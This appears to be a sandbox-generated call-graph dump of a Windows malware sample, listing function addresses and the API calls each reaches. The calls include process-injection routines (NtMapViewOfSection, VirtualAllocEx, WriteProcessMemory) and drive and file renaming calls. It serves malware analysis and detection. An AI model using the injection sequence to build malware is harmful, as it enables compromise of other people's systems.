100091e3 HeapAlloc 10321->10323 10322->10321 10323->10321 10325 1000a886 10324->10325 10345 1000a7bc 10325->10345 10328->10147 10358 1000c4ce 10329->10358 10332 1000cc80 10337 1000861a 2 API calls 10332->10337 10339 1000cca1 10332->10339 10333 1000cc72 FreeLibrary 10333->10332 10336 1000cbaa memset 10338 1000cbdf 10336->10338 10337->10339 10340 1000cbe7 NtProtectVirtualMemory 10338->10340 10341 1000cc67 10338->10341 10339->10147 10340->10341 10342 1000cc29 NtWriteVirtualMemory 10340->10342 10341->10332 10341->10333 10342->10341 10343 1000cc46 NtProtectVirtualMemory 10342->10343 10343->10341 10344->10321 10346 100122d3 _ftol2_sse 10345->10346 10347 1000a7d4 10346->10347 10348 100095c7 HeapAlloc 10347->10348 10349 1000a7fe 10348->10349 10354 10009601 10349->10354 10351 1000a85c 10352 100085c2 2 API calls 10351->10352 10353 1000a867 10352->10353 10353->10147 10355 1000874f memset 10354->10355 10356 10009615 _vsnprintf 10355->10356 10357 1000962f 10356->10357 10357->10351 10359 1000c4ea 10358->10359 10360 1000c4fc 10358->10360 10359->10360 10361 1000c627 10359->10361 10362 100095e1 HeapAlloc 10360->10362 10361->10341 10383 1000c6c0 10361->10383 10363 1000c509 10362->10363 10364 10009640 2 API calls 10363->10364 10365 1000c542 10364->10365 10366 100095e1 HeapAlloc 10365->10366 10367 1000c55f 10366->10367 10401 100092e5 10367->10401 10370 100085d5 2 API calls 10371 1000c587 10370->10371 10372 100092e5 2 API calls 10371->10372 10373 1000c5aa LoadLibraryW 10372->10373 10375 1000c5d5 10373->10375 10376 1000c5e3 10373->10376 10377 1000e171 3 API calls 10375->10377 10378 1000861a 2 API calls 10376->10378 10377->10376 10379 1000c5f8 memset 10378->10379 10379->10361 10380 1000c619 10379->10380 10381 1000861a 2 API calls 10380->10381 10382 1000c625 10381->10382 10382->10361 10385 1000c6f4 10383->10385 10384 1000c715 NtCreateSection 10386 1000c73e RegisterClassExA 10384->10386 10400 1000c880 10384->10400 10385->10384 10385->10400 10387 1000c790 CreateWindowExA 10386->10387 10388 1000c7cc GetCurrentProcess NtMapViewOfSection 10386->10388 10387->10388 10391 1000c7ba DestroyWindow UnregisterClassA 10387->10391 10392 1000c7f7 NtMapViewOfSection 10388->10392 10388->10400 10389 1000c8d2 GetCurrentProcess NtUnmapViewOfSection 10390 1000c8e5 10389->10390 10393 1000c8f8 10390->10393 10394 1000c8ed NtClose 10390->10394 10391->10388 10395 1000c81e 10392->10395 10392->10400 10393->10336 10393->10341 10394->10393 10396 10008669 HeapAlloc 10395->10396 10397 1000c82e 10396->10397 10398 1000c839 VirtualAllocEx WriteProcessMemory 10397->10398 10397->10400 10399 1000861a 2 API calls 10398->10399 10399->10400 10400->10389 10400->10390 10402 100092f7 10401->10402 10407 10008604 HeapAlloc 10402->10407 10404 10009316 10405 10009322 lstrcatW 10404->10405 10406 10009333 10404->10406 10405->10404 10406->10370 10407->10404 10528 10008604 HeapAlloc 10408->10528 10410 10009b6d 10439 10005c45 10410->10439 10529 1000b5f6 10410->10529 10413 100095c7 HeapAlloc 10414 10009bb0 10413->10414 10415 10009ceb 10414->10415 10420 10009bdc 10414->10420 10416 10009d3c 10415->10416 10417 10009cfd 10415->10417 10418 10009292 2 API calls 10416->10418 10421 10009292 2 API calls 10417->10421 10442 10009ce7 10417->10442 10418->10442 10419 100085c2 2 API calls 10423 10009d5c 10419->10423 10420->10442 10539 10009292 10420->10539 10421->10442 10424 1000861a 2 API calls 10423->10424 10435 10009db2 10423->10435 10425 10009d9b memset 10424->10425 10428 1000861a 2 API calls 10425->10428 10427 10009ca1 10431 10009292 2 API calls 10427->10431 10428->10435 10429 100095e1 HeapAlloc 10430 10009c3f 10429->10430 10432 100092e5 2 API calls 10430->10432 10434 10009cc8 10431->10434 10433 10009c51 10432->10433 10436 100085d5 2 API calls 10433->10436 10441 1000861a 2 API calls 10434->10441 10435->10435 10437 1000861a 2 API calls 10435->10437 10438 10009c5f 10436->10438 10437->10439 10545 10009256 10438->10545 10439->10152 10439->10153 10447 1000fb19 10439->10447 10441->10442 10442->10419 10444 1000861a 2 API calls 10445 10009c96 10444->10445 10446 1000861a 2 API calls 10445->10446 10446->10427 10553 10008604 HeapAlloc 10447->10553 10449 1000fb2a 10449->10153 10450 1000fb20 10450->10449 10554 1000a6a9 10450->10554 10453 1000fb6e 10453->10153 10455 1000fb55 10456 1000f8cc 15 API calls 10455->10456 10457 1000fb6b 10456->10457 10457->10153 10459 1000a86d 5 API calls 10458->10459 10460 10005d9a 10459->10460 10461 10005974 8 API calls 10460->10461 10463 10005c6e 10460->10463 10462 10005dd4 10461->10462 10462->10463 10586 10009ebb 10462->10586 10463->10157 10463->10158 10466 10005de6 lstrcmpiW 10466->10463 10468 1000a86d 5 API calls 10467->10468 10469 1000598d 10468->10469 10470 10009292 2 API calls 10469->10470 10472 1000599a 10469->10472 10471 100059bd 10470->10471 10610 1000590c 10471->10610 10474 100059cd 10475 100059f1 10474->10475 10478 1000590c 2 API calls 10474->10478 10476 1000861a 2 API calls 10475->10476 10477 100059fd 10476->10477 10479 10005bc4 10477->10479 10478->10475 10480 10009ebb 3 API calls 10479->10480 10481 10005bce 10480->10481 10482 10005bd7 10481->10482 10483 10005bdc lstrcmpiW 10481->10483 10482->10170 10484 10005bf2 10483->10484 10485 10005c14 10483->10485 10615 10009f6c 10484->10615 10487 1000861a 2 API calls 10485->10487 10487->10482 10658 10008604 HeapAlloc 10490->10658 10492 10005b11 10493 10005b24 GetDriveTypeW 10492->10493 10494 10005b55 10492->10494 10493->10494 10659 10005a7b 10494->10659 10496 10005b71 10497 10005ba1 10496->10497 10676 10004d6d 10496->10676 10762 1000a39e 10497->10762 10501 1000a39e 2 API calls 10502 10005bbd 10501->10502 10502->10160 10504 1000109a HeapAlloc 10503->10504 10505 1000f8db 10504->10505 11262 100061b4 memset 10505->11262 10508 100085d5 2 API calls 10509 1000f901 10508->10509 10510 1000f978 10509->10510 11274 10009e66 10509->11274 10510->10170 10514 1000f92c 10514->10510 10515 1000109a HeapAlloc 10514->10515 10516 1000f93e 10515->10516 10517 10009640 2 API calls 10516->10517 10518 1000f94d 10517->10518 10519 1000a911 2 API calls 10518->10519 10520 1000f95e 10519->10520 10521 1000f96c 10520->10521 11280 1000a239 10520->11280 10523 1000861a 2 API calls 10521->10523 10523->10510 10525 10005a73 10524->10525 11288 10005631 10525->11288 10528->10410 10530 1000b60f 10529->10530 10531 1001242d _ftol2_sse 10530->10531 10532 1000b61f 10531->10532 10533 100095c7 HeapAlloc 10532->10533 10535 1000b62e 10533->10535 10534 1000b66a 10536 100085c2 2 API calls 10534->10536 10535->10534 10537 1001242d _ftol2_sse 10535->10537 10538 10009b91 10536->10538 10537->10535 10538->10413 10540 100092a4 10539->10540 10551 10008604 HeapAlloc 10540->10551 10542 100092c1 10543 100092de 10542->10543 10544 100092cd lstrcatA 10542->10544 10543->10423 10543->10427 10543->10429 10544->10542 10546 1000928c 10545->10546 10547 1000925f 10545->10547 10546->10444 10552 10008604 HeapAlloc 10547->10552 10549 10009271 10549->10546 10550 10009279 MultiByteToWideChar 10549->10550 10550->10546 10551->10542 10552->10549 10553->10450 10555 1000a6c2 10554->10555 10556 1000a6bb 10554->10556 10555->10556 10559 1000a6f0 10555->10559 10581 10008604 HeapAlloc 10555->10581 10556->10453 10560 1000f9bf 10556->10560 10558 1000861a 2 API calls 10558->10556 10559->10556 10559->10558 10582 10008604 HeapAlloc 10560->10582 10562 1000fb10 10562->10455 10563 1000f9d2 10563->10562 10565 1000fabc 10563->10565 10583 1000109a 10563->10583 10567 1000861a 2 API calls 10565->10567 10567->10562 10568 100095e1 HeapAlloc 10569 1000fa2c 10568->10569 10570 100092e5 2 API calls 10569->10570 10571 1000fa49 10570->10571 10572 1000a6a9 3 API calls 10571->10572 10573 1000fa56 10572->10573 10574 100085d5 2 API calls 10573->10574 10575 1000fa62 10574->10575 10576 100085d5 2 API calls 10575->10576 10578 1000fa6b 10576->10578 10577 1000861a 2 API calls 10579 1000fab1 10577->10579 10578->10577 10580 1000861a 2 API calls 10579->10580 10580->10565 10581->10559 10582->10563 10584 10008531 HeapAlloc 10583->10584 10585 100010b5 10584->10585 10585->10568 10589 10009f95 10586->10589 10590 10009fbe 10589->10590 10601 10009b0e 10590->10601 10592 10005de2 10592->10463 10592->10466 10593 10009fc9 10593->10592 10604 1000be9b 10593->10604 10595 1000a095 10596 1000861a 2 API calls 10595->10596 10596->10592 10597 1000a070 10599 1000861a 2 API calls 10597->10599 10598 10009ffd 10598->10595 10598->10597 10600 10008669 HeapAlloc 10598->10600 10599->10595 10600->10597 10608 10008604 HeapAlloc 10601->10608 10603 10009b1a 10603->10593 10605 1000bec1 10604->10605 10607 1000bec5 10605->10607 10609 10008604 HeapAlloc 10605->10609 10607->10598 10608->10603 10609->10607 10611 1000591c 10610->10611 10614 10005917 10610->10614 10612 10005934 GetLastError 10611->10612 10613 1000593f GetLastError 10611->10613 10612->10614 10613->10614 10614->10474 10616 10009f7c 10615->10616 10631 1000a0ab 10616->10631 10619 1000b1b1 SetFileAttributesW memset 10620 1000b1ec 10619->10620 10621 1000b1ff 10620->10621 10622 1001242d _ftol2_sse 10620->10622 10621->10485 10623 1000b21b 10622->10623 10624 10009640 2 API calls 10623->10624 10625 1000b22c 10624->10625 10626 100092e5 2 API calls 10625->10626 10627 1000b23d 10626->10627 10627->10621 10646 1000b0de 10627->10646 10630 1000861a 2 API calls 10630->10621 10632 10005c08 10631->10632 10633 1000a0c8 10631->10633 10632->10485 10632->10619 10633->10632 10634 1001242d _ftol2_sse 10633->10634 10635 1000a112 10634->10635 10645 10008604 HeapAlloc 10635->10645 10637 1000a126 10637->10632 10638 100122d3 _ftol2_sse 10637->10638 10639 1000a168 10638->10639 10640 10009b0e HeapAlloc 10639->10640 10642 1000a1b4 10640->10642 10641 1000861a 2 API calls 10641->10632 10643 1000861a 2 API calls 10642->10643 10644 1000a21e 10642->10644 10643->10644 10644->10641 10645->10637 10647 1000b101 10646->10647 10648 1000b109 memset 10647->10648 10657 1000b178 10647->10657 10649 100095e1 HeapAlloc 10648->10649 10650 1000b125 10649->10650 10651 1001242d _ftol2_sse 10650->10651 10652 1000b141 10651->10652 10653 10009640 2 API calls 10652->10653 10654 1000b157 10653->10654 10655 100085d5 2 API calls 10654->10655 10656 1000b160 MoveFileW 10655->10656 10656->10657 10657->10630 10658->10492 10770 10001080 10659->10770 10664 100085c2 2 API calls 10665 10005ab7 10664->10665 10666 10001080 HeapAlloc 10665->10666 10675 10005af7 10665->10675 10667 10005ac5 10666->10667 10779 10008910 10667->10779 10671 100085c2 2 API calls 10673 10005aeb 10671->10673 10672 10005ae1 10672->10671 10674 1000861a 2 API calls 10673->10674 10674->10675 10675->10496 10677 10004d91 10676->10677 10678 10004de7 10676->10678 10680 100095c7 HeapAlloc 10677->10680 10679 1000b7a8 10 API calls 10678->10679 10690 10004e1d 10678->10690 10681 10004dfc 10679->10681 10682 10004d9b 10680->10682 10683 1000a86d 5 API calls 10681->10683 10684 100095c7 HeapAlloc 10682->10684 10685 10004e08 10683->10685 10686 10004dab 10684->10686 10875 1000a471 10685->10875 10686->10678 10689 10004db9 GetModuleHandleA 10686->10689 10688 10004e14 10688->10690 10693 1000e1bc 7 API calls 10688->10693 10691 10004dc6 GetModuleHandleA 10689->10691 10692 10004dcd 10689->10692 10690->10497 10691->10692 10694 100085c2 2 API calls 10692->10694 10695 10004e37 10693->10695 10697 10004dde 10694->10697 10696 100095e1 HeapAlloc 10695->10696 10698 10004e48 10696->10698 10699 100085c2 2 API calls 10697->10699 10700 100092e5 2 API calls 10698->10700 10699->10678 10701 10004e60 10700->10701 10702 100085d5 2 API calls 10701->10702 10704 10004e73 10702->10704 10703 10004e9c 10706 1000861a 2 API calls 10703->10706 10704->10703 10880 1000896f 10704->10880 10707 10004ead 10706->10707 10900 10004a0b memset 10707->10900 10708 10004e8f 10708->10703 10711 1000a2e3 6 API calls 10708->10711 10711->10703 10712 100051f1 10714 100095e1 HeapAlloc 10712->10714 10716 100051fd 10714->10716 10717 100092e5 2 API calls 10716->10717 10721 10005215 10717->10721 10718 10005245 10720 100085d5 2 API calls 10718->10720 10719 1000e2c6 40 API calls 10722 10004f64 10719->10722 10723 10005251 lstrcpynW lstrcpynW 10720->10723 10721->10718 10726 1000861a 2 API calls 10721->10726 10722->10712 10724 10004fb3 10722->10724 10729 10005082 10722->10729 10725 10005296 10723->10725 10724->10712 10731 10004fbc 10724->10731 10727 1000861a 2 API calls 10725->10727 10726->10718 10728 100052a8 10727->10728 10730 1000861a 2 API calls 10728->10730 10729->10712 10974 1000fc1f 10729->10974 10730->10690 10969 10008604 HeapAlloc 10731->10969 10734 10005006 10734->10690 10736 100095e1 HeapAlloc 10734->10736 10738 1000501f 10736->10738 10740 10009640 2 API calls 10738->10740 10739 10005110 10739->10712 10742 1000109a HeapAlloc 10739->10742 10741 10005052 10740->10741 10743 100085d5 2 API calls 10741->10743 10744 10005129 10742->10744 10745 1000505c 10743->10745 10746 1000902d _ftol2_sse 10744->10746 10970 1000a911 memset 10745->10970 10748 1000514b 10746->10748 10985 100060df 10748->10985 10753 100051e2 10755 10009640 2 API calls 10764 1000a3ad 10762->10764 10769 10005bb5 10762->10769 10763 1000a3d2 10765 1000861a 2 API calls 10763->10765 10764->10763 10766 1000861a 2 API calls 10764->10766 10767 1000a3dd 10765->10767 10766->10764 10768 1000861a 2 API calls 10767->10768 10768->10769 10769->10501 10771 100084ab HeapAlloc 10770->10771 10772 10001096 10771->10772 10773 1000a51a 10772->10773 10774 1000a538 10773->10774 10775 1001242d _ftol2_sse 10774->10775 10776 1000a580 10774->10776 10778 10005aa7 10774->10778 10775->10774 10777 10008669 HeapAlloc 10776->10777 10776->10778 10777->10778 10778->10664 10780 10005ad4 10779->10780 10781 1000891f 10779->10781 10780->10672 10787 1000a2e3 10780->10787 10798 10008604 HeapAlloc 10781->10798 10783 10008929 10783->10780 10799 10008815 10783->10799 10786 1000861a 2 API calls 10786->10780 10834 10008a90 10787->10834 10791 1000a397 10791->10672 10792 1000a38f 10849 10008cc0 10792->10849 10795 1000a2fd 10795->10791 10795->10792 10796 10008698 3 API calls 10795->10796 10840 10009749 10795->10840 10845 100091a6 10795->10845 10796->10795 10798->10783 10809 10008604 HeapAlloc 10799->10809 10801 100088d6 10803 1000861a 2 API calls 10801->10803 10808 10008837 10801->10808 10802 1000882a 10802->10801 10802->10808 10810 1000ebf0 10802->10810 10803->10808 10806 100088f0 10807 1000861a 2 API calls 10806->10807 10807->10808 10808->10780 10808->10786 10809->10802 10825 10008604 HeapAlloc 10810->10825 10812 1000ec14 10813 1000ed7f 10812->10813 10826 10008604 HeapAlloc 10812->10826 10816 1000861a 2 API calls 10813->10816 10815 1000ec2c 10815->10813 10827 10008604 HeapAlloc 10815->10827 10817 1000eda5 10816->10817 10819 1000861a 2 API calls 10817->10819 10820 1000edb3 10819->10820 10821 100088cf 10820->10821 10822 1000861a 2 API calls 10820->10822 10821->10801 10821->10806 10822->10821 10823 1000ec42 10823->10813 10828 10008698 10823->10828 10825->10812 10826->10815 10827->10823 10833 10008604 HeapAlloc 10828->10833 10830 100086ad 10831 1000861a 2 API calls 10830->10831 10832 100086d5 10830->10832 10831->10832 10832->10823 10833->10830 10837 10008ab3 10834->10837 10835 10008604 HeapAlloc 10835->10837 10836 10008be7 10839 10008604 HeapAlloc 10836->10839 10837->10835 10837->10836 10838 1000861a 2 API calls 10837->10838 10838->10837 10839->10795 10841 1000974b 10840->10841 10842 10009780 SetLastError 10841->10842 10843 1000978c SetLastError 10841->10843 10844 10009799 10842->10844 10843->10844 10844->10795 10846 100091b1 10845->10846 10847 100091c7 10845->10847 10861 10008604 HeapAlloc 10846->10861 10847->10795 10850 10008ccf 10849->10850 10860 10008d57 10849->10860 10851 10008d09 10850->10851 10852 1000861a 2 API calls 10850->10852 10850->10860 10855 10008d19 10851->10855 10862 10008de5 10851->10862 10852->10850 10854 10008d34 10857 10008d4a 10854->10857 10859 1000861a 2 API calls 10854->10859 10855->10854 10856 1000861a 2 API calls 10855->10856 10856->10854 10858 1000861a 2 API calls 10857->10858 10858->10860 10859->10857 10860->10791 10861->10847 10869 10008604 HeapAlloc 10862->10869 10864 10008e28 10864->10855 10865 10008e1e 10865->10864 10867 10008e61 10865->10867 10870 1000879d 10865->10870 10868 1000861a 2 API calls 10867->10868 10868->10864 10869->10865 10871 1001242d _ftol2_sse 10870->10871 10872 100087b6 10871->10872 10873 100087e3 10872->10873 10874 1001242d _ftol2_sse 10872->10874 10873->10867 10874->10872 10876 1000a485 10875->10876 10877 1000a495 GetLastError 10876->10877 10878 1000a48b GetLastError 10876->10878 10879 1000a4a2 10877->10879 10878->10879 10879->10688 10995 10008604 HeapAlloc 10880->10995 10882 10008990 10883 100089a1 lstrcpynW 10882->10883 10890 1000899a 10882->10890 10884 10008a14 10883->10884 10885 100089c4 10883->10885 10996 10008604 HeapAlloc 10884->10996 10887 1000a6a9 3 API calls 10885->10887 10889 100089d0 10887->10889 10888 10008a1f 10888->10890 10892 1000861a 2 API calls 10888->10892 10896 10008a39 10888->10896 10891 10008815 3 API calls 10889->10891 10889->10896 10890->10708 10893 100089ea 10891->10893 10892->10896 10893->10888 10897 100089f0 10893->10897 10894 10008a61 10895 1000861a 2 API calls 10894->10895 10895->10890 10896->10894 10898 1000861a 2 API calls 10896->10898 10899 1000861a 2 API calls 10897->10899 10898->10894 10899->10890 10901 10004a41 10900->10901 10902 10004a76 10901->10902 10997 10002ba4 10901->10997 10903 1000b7a8 10 API calls 10902->10903 10906 10004ae2 10902->10906 10905 10004a8d 10903->10905 10907 1000b67d 4 API calls 10905->10907 10906->10712 10964 1000e2c6 10906->10964 10908 10004a9d 10907->10908 11013 100049c7 10908->11013 10910 10004aa7 10966 1000e2fa 10964->10966 10965 10004f40 10965->10719 10965->10722 10966->10965 11166 10008604 HeapAlloc 10966->11166 11167 10004905 10966->11167 10969->10734 10975 1000fc43 10974->10975 10976 100050fa 10974->10976 10977 10008669 HeapAlloc 10975->10977 10976->10712 10984 10008604 HeapAlloc 10976->10984 10978 1000fc4d 10977->10978 10978->10976 10979 1000fc8e 10978->10979 10980 100060df 4 API calls 10978->10980 10981 1000861a 2 API calls 10979->10981 10982 1000fcac 10980->10982 10981->10976 10982->10979 11226 1000f7e3 10982->11226 10984->10739 10986 100060ea 10985->10986 10994 10005168 10985->10994 11261 10008604 HeapAlloc 10986->11261 10994->10753 10994->10755 10995->10882 10996->10888 10998 10002bc0 10997->10998 10999 10002c5c 10998->10999 11000 1000109a HeapAlloc 10998->11000 10999->10902 11001 10002bd3 11000->11001 11002 100092e5 2 API calls 11001->11002 11003 10002be5 11002->11003 11004 100085d5 2 API calls 11003->11004 11005 10002bf0 11004->11005 11006 1000109a HeapAlloc 11005->11006 11007 10002bfa 11006->11007 11131 1000bf37 11007->11131 11010 100085d5 2 API calls 11011 10002c16 11010->11011 11012 1000861a 2 API calls 11011->11012 11012->10999 11014 10009256 2 API calls 11013->11014 11015 100049d2 11014->11015 11016 100095e1 HeapAlloc 11015->11016 11017 100049e1 11016->11017 11018 100092e5 2 API calls 11017->11018 11019 100049ed 11018->11019 11020 100085d5 2 API calls 11019->11020 11021 100049f8 11020->11021 11022 1000861a 2 API calls 11021->11022 11023 10004a03 11022->11023 11023->10910 11132 1000bf64 11131->11132 11135 10002c08 11132->11135 11137 10008604 HeapAlloc 11132->11137 11134 1000bf94 11134->11135 11136 1000861a 2 API calls 11134->11136 11135->11010 11136->11135 11137->11134 11166->10966 11168 10004928 11167->11168 11169 10004995 11168->11169 11170 10004a0b 35 API calls 11168->11170 11169->10966 11172 10004948 11170->11172 11171 10004986 11185 100047ca 11171->11185 11172->11169 11172->11171 11175 1000ad44 11172->11175 11176 1000ad65 11175->11176 11177 1000ad5e 11175->11177 11178 1000ad71 GetLastError 11176->11178 11179 1000ad79 11176->11179 11177->11172 11178->11177 11180 1000b998 6 API calls 11179->11180 11181 1000ad8b 11180->11181 11181->11177 11182 1000ada2 memset 11181->11182 11184 1000adea 11181->11184 11182->11184 11183 1000861a 2 API calls 11183->11177 11184->11183 11186 100060df 4 API calls 11185->11186 11187 100047ef 11186->11187 11188 1000109a HeapAlloc 11187->11188 11201 100047fb 11187->11201 11189 1000481a 11188->11189 11190 100092e5 2 API calls 11189->11190 11191 1000482c 11190->11191 11192 100085d5 2 API calls 11191->11192 11201->11169 11227 1000f883 11226->11227 11228 1000f7fe 11226->11228 11230 1000109a HeapAlloc 11227->11230 11229 1000109a HeapAlloc 11228->11229 11231 1000f809 11229->11231 11232 1000f88d 11230->11232 11234 10006144 7 API calls 11232->11234 11286 10008604 HeapAlloc 11262->11286 11264 100061ef 11265 10006360 11264->11265 11287 10008604 HeapAlloc 11264->11287 11265->10508 11267 1000626f 11268 1000861a 2 API calls 11267->11268 11269 10006352 11268->11269 11270 1000861a 2 API calls 11269->11270 11270->11265 11271 1000628d memset memset 11272 10006209 11271->11272 11272->11265 11272->11267 11272->11271 11273 1000b1b1 10 API calls 11272->11273 11273->11272 11275 10009f95 3 API calls 11274->11275 11276 10009e87 11275->11276 11277 10009e9e 11276->11277 11278 1000861a 2 API calls 11276->11278 11277->10510 11279 10008604 HeapAlloc 11277->11279 11278->11277 11279->10514 11281 1000a245 11280->11281 11282 10009b0e HeapAlloc 11281->11282 11284 1000a275 11282->11284 11283 1000a2da 11283->10521 11284->11283 11285 1000861a 2 API calls 11284->11285 11285->11283 11286->11264 11287->11272 11289 10009e66 3 API calls 11288->11289 11290 10005642 11289->11290 11291 1000980c GetSystemTimeAsFileTime 11290->11291 11323 100056c0 11290->11323 11292 1000565b 11291->11292 11293 10009f06 4 API calls 11292->11293 11294 1000566f 11293->11294 11295 10009f06 4 API calls 11294->11295 11296 10005685 11295->11296 11324 1000e4c1 11296->11324 11299 1000a86d 5 API calls 11300 100056a4 11299->11300 11301 100056e9 11300->11301 11300->11323 11331 10008604 HeapAlloc 11300->11331 11332 1000153b CreateMutexA 11301->11332 11304 10005707 11347 100098ee 11304->11347 11306 10005715 11359 10003017 11306->11359 11323->10162 11325 1000e1bc 7 API calls 11324->11325 11326 1000e4d3 11325->11326 11327 1000e1bc 7 API calls 11326->11327 11328 1000e4ec 11327->11328 11424 1000e450 11328->11424 11330 1000568d 11330->11299 11331->11301 11333 10001558 CreateMutexA 11332->11333 11343 100015ad 11332->11343 11334 1000156e 11333->11334 11333->11343 11335 10001080 HeapAlloc 11334->11335 11336 10001578 11335->11336 11337 100091a6 HeapAlloc 11336->11337 11336->11343 11338 1000158c 11337->11338 11339 100085c2 2 API calls 11338->11339 11340 10001599 11339->11340 11438 10008604 HeapAlloc 11340->11438 11342 100015a3 11342->11343 11439 10008604 HeapAlloc 11342->11439 11343->11304 11345 100015c4 11345->11343 11346 1000e1bc 7 API calls 11345->11346 11346->11343 11348 1000990c 11347->11348 11349 10009910 11348->11349 11350 1000996c 11348->11350 11440 1000984a 11348->11440 11349->11306 11352 1000997d 11350->11352 11444 10008604 HeapAlloc 11350->11444 11352->11349 11353 1000a471 2 API calls 11352->11353 11355 100099e2 11353->11355 11356 10009a56 SetThreadPriority 11355->11356 11357 10009a1f 11355->11357 11356->11349 11357->11349 11358 1000861a 2 API calls 11357->11358 11358->11349 11360 10003025 11359->11360 11362 1000302a 11359->11362 11445 1000bb20 11360->11445 11363 100031c2 11362->11363 11364 1000c292 6 API calls 11363->11364 11365 100031dd 11364->11365 11371 100031e6 11365->11371 11452 10008604 HeapAlloc 11365->11452 11367 100031fa 11369 10003204 11367->11369 11453 1000bd10 11367->11453 11370 1000861a 2 API calls 11369->11370 11370->11371 11376 100029b1 11371->11376 11375 100098ee 6 API calls 11375->11369 11377 10009e66 3 API calls 11376->11377 11378 100029cf 11377->11378 11462 100028fb 11378->11462 11381 100028fb 3 API calls 11382 100029f8 11381->11382 11466 10009ea5 11382->11466 11385 100093be HeapAlloc 11389 10002a1b 11385->11389 11386 10002a37 11388 100094b7 2 API calls 11386->11388 11390 10002a42 11388->11390 11389->11386 11469 10002a53 11389->11469 11391 1000861a 2 API calls 11390->11391 11392 10002a4c 11391->11392 11393 10003bb2 11392->11393 11477 10004145 11393->11477 11425 1000e49a 11424->11425 11426 1000e45e 11424->11426 11427 100095c7 HeapAlloc 11425->11427 11437 10008604 HeapAlloc 11426->11437 11429 1000e4a4 11427->11429 11431 100091a6 HeapAlloc 11429->11431 11430 1000e46f 11434 1000e4bd 11430->11434 11435 1000861a 2 API calls 11430->11435 11432 1000e4b0 11431->11432 11433 100085c2 2 API calls 11432->11433 11433->11434 11434->11330 11436 1000e493 11435->11436 11436->11330 11437->11430 11438->11342 11439->11345 11441 10009854 11440->11441 11442 10009879 11441->11442 11443 1000861a 2 API calls 11441->11443 11442->11348 11443->11442 11444->11352 11446 1000bb37 11445->11446 11447 1000bb56 11446->11447 11448 100095e1 HeapAlloc 11446->11448 11447->11362 11449 1000bb65 lstrcmpiW 11448->11449 11450 1000bb7b 11449->11450 11451 100085d5 2 API calls 11450->11451 11451->11447 11452->11367 11456 1000bd5e 11453->11456 11454 10003210 11454->11369 11457 1000bc7a 11454->11457 11455 1000bdfe LocalAlloc 11455->11454 11456->11454 11456->11455 11458 100095e1 HeapAlloc 11457->11458 11461 1000bca0 11458->11461 11459 100085d5 2 API calls 11460 10003268 11459->11460 11460->11375 11461->11459 11463 10002905 11462->11463 11464 1000291c 11462->11464 11465 10008698 3 API calls 11463->11465 11464->11381 11465->11464 11467 10009f95 3 API calls 11466->11467 11468 10002a03 11467->11468 11468->11385 11468->11392 11470 10002a5f 11469->11470 11471 10002a6a atol 11470->11471 11476 10002a65 11470->11476 11472 10002a81 11471->11472 11473 10009749 2 API calls 11472->11473 11472->11476 11476->11389 11522 1000378c 11477->11522 11523 100037b6 11522->11523 11529 100090a5 11523->11529 11530 1000902d _ftol2_sse 11529->11530 11582->10173 11583->10176 11813 1000540e 11818 1000d603 11813->11818 11816 10005423 GetLastError 11817 1000542c 11816->11817 11841 10008604 HeapAlloc 11818->11841 11820 1000d61d 11821 100091e3 HeapAlloc 11820->11821 11839 1000541f 11820->11839 11822 1000d632 11821->11822 11822->11839 11842 1000c3a7 11822->11842 11825 100095e1 HeapAlloc 11826 1000d652 11825->11826 11827 10009640 2 API calls 11826->11827 11828 1000d667 11827->11828 11829 100085d5 2 API calls 11828->11829 11830 1000d670 11829->11830 11848 1000d44b 11830->11848 11832 1000d67a 11840 1000d683 11832->11840 11855 1000d497 11832->11855 11834 1000861a 2 API calls 11835 1000d720 11834->11835 11836 1000861a 2 API calls 11835->11836 11837 1000d72b 11836->11837 11838 1000861a 2 API calls 11837->11838 11838->11839 11839->11816 11839->11817 11840->11834 11841->11820 11843 1000c3c0 11842->11843 11844 10008698 3 API calls 11843->11844 11846 1000c4c0 11843->11846 11847 1000c43b 11843->11847 11844->11847 11845 1000874f memset 11845->11846 11846->11825 11847->11845 11847->11846 11849 100095e1 HeapAlloc 11848->11849 11850 1000d45a 11849->11850 11868 1000950e 11850->11868 11853 100085d5 2 API calls 11854 1000d46f 11853->11854 11854->11832 11856 100092e5 2 API calls 11855->11856 11857 1000d4b0 CoInitializeEx 11856->11857 11858 100095e1 HeapAlloc 11857->11858 11859 1000d4cb 11858->11859 11860 100095e1 HeapAlloc 11859->11860 11861 1000d4dc 11860->11861 11862 100085d5 2 API calls 11861->11862 11863 1000d4f8 11862->11863 11864 100085d5 2 API calls 11863->11864 11865 1000d50e 11864->11865 11866 1000861a 2 API calls 11865->11866 11867 1000d519 11866->11867 11867->11840 11869 1000902d _ftol2_sse 11868->11869 11870 10009531 11869->11870 11871 100092e5 2 API calls 11870->11871 11872 10009552 11871->11872 11872->11853 11584 10005e96 11585 10005ea6 ExitProcess 11584->11585 13373 1000229a 13374 100022c3 13373->13374 13375 100022ab 13373->13375 13408 10002255 13374->13408 13376 10009749 2 API calls 13375->13376 13378 100022b8 13376->13378 13383 10006aed 13378->13383 13381 100094b7 2 API calls 13382 100022dc 13381->13382 13384 10006b0f 13383->13384 13396 10006b07 13383->13396 13385 1000b4a3 2 API calls 13384->13385 13386 10006b18 13385->13386 13386->13396 13415 1000fccd 13386->13415 13388 10006b2c 13390 1000914f 5 API calls 13388->13390 13405 10006b32 13388->13405 13389 1000861a 2 API calls 13389->13396 13391 10006b65 13390->13391 13392 100060df 4 API calls 13391->13392 13391->13396 13393 10006b77 13392->13393 13394 10006b84 13393->13394 13397 10006b9c 13393->13397 13395 1000861a 2 API calls 13394->13395 13395->13396 13396->13374 13398 10005886 7 API calls 13397->13398 13407 10006bbc 13397->13407 13399 10006bb8 13398->13399 13402 10009749 2 API calls 13399->13402 13399->13407 13400 1000861a 2 API calls 13401 10006bf0 13400->13401 13403 1000861a 2 API calls 13401->13403 13404 10006bc9 13402->13404 13403->13405 13406 10009f06 4 API calls 13404->13406 13405->13389 13406->13407 13407->13400 13409 1000b4a3 2 API calls 13408->13409 13410 10002266 13409->13410 13411 10002296 13410->13411 13412 10002287 13410->13412 13414 1000a0ab 4 API calls 13410->13414 13411->13381 13413 1000861a 2 API calls 13412->13413 13413->13411 13414->13412 13416 1000fd18 13415->13416 13417 1000fcdc 13415->13417 13423 10008604 HeapAlloc 13416->13423 13418 1000861a 2 API calls 13417->13418 13420 1000fce5 13418->13420 13421 10008669 HeapAlloc 13420->13421 13422 1000fcfc 13420->13422 13421->13422 13422->13388 13423->13420 11586 10001a1b 11587 10001a82 11586->11587 11588 10001a3c 11586->11588 11589 10001aac 11587->11589 11642 1000160d 11587->11642 11590 10009ea5 3 API calls 11588->11590 11601 10001ab4 